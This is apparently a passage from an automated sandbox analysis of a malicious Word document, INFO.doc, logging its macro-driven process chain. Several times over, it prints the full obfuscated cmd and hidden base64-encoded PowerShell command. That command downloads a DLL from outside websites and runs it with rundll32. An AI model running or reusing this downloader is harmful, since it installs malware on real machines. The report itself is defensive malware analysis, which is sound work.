wAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgAC
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Snuvw2w\V4651pz\H64C.dll',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jqqmr\igpp.bdm',vHnBlDVDvG
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jqqmr\igpp.bdm',#1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgACJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyStringJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyStringJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Snuvw2w\V4651pz\H64C.dll',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jqqmr\igpp.bdm',vHnBlDVDvGJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jqqmr\igpp.bdm',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2093659787.0000000002957000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2093659787.0000000002957000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbC:\W source: powershell.exe, 00000005.00000002.2093659787.0000000002957000.00000004.00000040.sdmp
                      Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2093659787.0000000002957000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2093659787.0000000002957000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb!! source: powershell.exe, 00000005.00000002.2093659787.0000000002957000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2093659787.0000000002957000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2093659787.0000000002957000.00000004.00000040.sdmp
                      Source: Binary string: ws\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dllem.pdb5\ source: powershell.exe, 00000005.00000002.2093659787.0000000002957000.00000004.00000040.sdmp
                      Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2093659787.0000000002957000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2093659787.0000000002957000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2093659787.0000000002957000.00000004.00000040.sdmp
                      Source: Binary string: m.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2093659787.0000000002957000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2093674985.0000000002AF0000.00000002.00000001.sdmp
                      Source: INFO.docInitial sample: OLE summary subject = Lithuanian Litas Interactions Intelligent Steel Hat Down-sized port XML Coordinator Response Jewelery & Games Cambridgeshire Steel SSL XSS artificial intelligence

                      Data Obfuscation:

                      barindex
                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
                      Source: INFO.docStream path 'Macros/VBA/X1bqz0qaer43b52bf' : High number of GOTO operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module X1bqz0qaer43b52bfName: X1bqz0qaer43b52bf
                      Document contains an embedded VBA with many string operations indicating source code obfuscationShow sources
                      Source: INFO.docStream path 'Macros/VBA/X1bqz0qaer43b52bf' : High number of string operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of string operations: Module X1bqz0qaer43b52bfName: X1bqz0qaer43b52bf
                      Obfuscated command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcA
                      Suspicious powershell command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgAC
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgACJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0019FED0 push edx; ret 7_2_0019FFD4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00181155 push ecx; ret 7_2_00181156
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001821EC pushad ; ret 7_2_00182200
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00183391 push eax; iretd 7_2_001833AE
